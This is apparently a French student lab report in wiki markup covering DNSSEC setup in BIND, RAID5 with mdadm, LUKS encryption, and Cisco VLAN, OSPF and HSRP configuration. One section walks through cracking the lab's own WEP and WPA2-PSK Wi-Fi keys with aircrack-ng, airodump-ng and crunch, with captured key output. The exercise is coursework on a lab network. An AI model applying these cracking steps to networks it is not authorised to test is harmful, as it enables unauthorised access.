==== Génération de paires de clefs KSK et ZSK ====&lt;br /&gt;
&lt;br /&gt;
Tout comme pour le certification HTTPS,il faut générer deux paires de clefs pour notre DNSSEC. On peut le faire avec la méthode RSAHA1 suivante :&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
On obtient alors deux paires de clefs que l'on renomme et que l'on place dans un dossier (que l'on créé evidemment) à l'emplacement '''/etc/bind/ima2a5-rex4ever.site.dnssec'''&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/db.ima2a5-rex4ever.site ====&lt;br /&gt;
Pour une raison que j'ignore, les commandes liées au DNS ont du mal avec les fichiers en db.quelquechose, on renomme donc '''db.ima2a5-rex4ever.site''' en '''ima2a5-rex4ever.site'''&lt;br /&gt;
Puis on ouvre ce fichier fraichement renommé et on ajoute les lignes de la manière suivante :&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL	604800&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk.key'''&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk.key'''&lt;br /&gt;
  @	IN	SOA	dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (&lt;br /&gt;
  			29112025	; Serial&lt;br /&gt;
  			 604800		; Refresh&lt;br /&gt;
    			  86400		; Retry&lt;br /&gt;
  			2419200		; Expire&lt;br /&gt;
  			 604800 )	; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
  @  	IN	NS	dns.ima2a5-rex4ever.site.&lt;br /&gt;
  @       IN      NS      ns6.gandi.net.&lt;br /&gt;
  dns	IN	A	193.48.57.163&lt;br /&gt;
  www     IN      A       193.48.57.163&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant faire signer le document grâce à la commande suivante (on créé ainsi le document '''ima2a5-rex4ever.site.signed'''):&lt;br /&gt;
   dnssec-signzone -o ima2a5-rex4ever.site -k ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk ima2a5-rex4ever.site ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.local ====&lt;br /&gt;
Maintenant que le document est signé, il faut dire à Bind de pointer sur celui-ci plutot que sur db....&lt;br /&gt;
Pour ce faire il faut modifier named.conf.local de cette manière :&lt;br /&gt;
&lt;br /&gt;
//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
	type master;&lt;br /&gt;
	file &amp;quot;/etc/bind/ima2a5-rex4ever.site.signed&amp;quot;;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.options ====&lt;br /&gt;
De même que pour le DNS, il faut modifier de la manière suivante pour le DNSSEC :&lt;br /&gt;
   '''dnssec-validation auto;'''&lt;br /&gt;
   '''dnssec-enable yes;'''&lt;br /&gt;
   '''dnssec-lookaside auto;'''&lt;br /&gt;
        auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
    };&lt;br /&gt;
    &lt;br /&gt;
    acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
        217.70.177.40/32; // adresse IP du dns6.gandi.net&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a relancer , et on peut voir le résultat grâce à [https://dnsviz.net DNSVIZ]&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
Le cryptage des données s'effectue grâce à l'utilitaire [https://doc.ubuntu-fr.org/cryptsetup cryptsetup]. Pour se faire, on commence par chercher le nom de la clef USB cible dans le gestionnaire :&lt;br /&gt;
      lsblk&lt;br /&gt;
Dans notre cas,le périphérique cible est nommé '''sdb1'''&lt;br /&gt;
On va acceder aux partitions via :&lt;br /&gt;
      fdisk /dev/sdb1&lt;br /&gt;
Le menu suivant apparait alors :&lt;br /&gt;
   Welcome to fdisk (util-linux 2.25.2).&lt;br /&gt;
   Changes will remain in memory only, until you decide to write them.&lt;br /&gt;
   Be careful before using the write command.&lt;br /&gt;
   Command (m for help):&lt;br /&gt;
On va d'abord nettoyer la clef avant d'y crypter nos données, pour cela on entre le choix 'd' et on supprime les partitions existantes.&lt;br /&gt;
&lt;br /&gt;
Puis pour créer une nouvelle partition on entre le choix 'n' puis 'p' qui correspond à :&lt;br /&gt;
'''n''' nouvelle partition&lt;br /&gt;
'''p''' partition primaire&lt;br /&gt;
&lt;br /&gt;
Command (m for help): n&lt;br /&gt;
Partition type&lt;br /&gt;
   p   primary (0 primary, 0 extended, 4 free)&lt;br /&gt;
   e   extended (container for logical partitions)&lt;br /&gt;
Select (default p):&lt;br /&gt;
&lt;br /&gt;
Using default response p.&lt;br /&gt;
Partition number (1-4, default 1):&lt;br /&gt;
First sector (2048-1953525167, default 2048):&lt;br /&gt;
Last sector, +sectors or +size{K,M,G,T,P} (2048-1953525167, default 1953525167):&lt;br /&gt;
Created a new partition 1 of type 'Linux' and of size xxxx.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis on sauvegarde : &lt;br /&gt;
&lt;br /&gt;
Command (m for help): w&lt;br /&gt;
The partition table has been altered.&lt;br /&gt;
Calling ioctl() to re-read partition table.&lt;br /&gt;
Syncing disks.&lt;br /&gt;
&lt;br /&gt;
La clef est prête, on peut desormais crypter avec l'utilitaire cyptsetup &lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/sdb1&lt;br /&gt;
    cryptsetup open --type luks /dev/sdb1 clef_ima2a_G5&lt;br /&gt;
    mkfs.ext4 /dev/mapper/clef_ima2a_G5&lt;br /&gt;
    mount -t ext4 /dev/mapper/clef_ima2a_G5 /mnt/clef&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA2-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur ====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E306 !! E304&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/1 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 1/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/3 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 2/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 5/1(E306) &amp;amp; Ge 1/1(E304) &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 1/1(E306) &amp;amp; Ge 2/2(E304) &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   ip routing&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.254   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.6 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface BDI1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
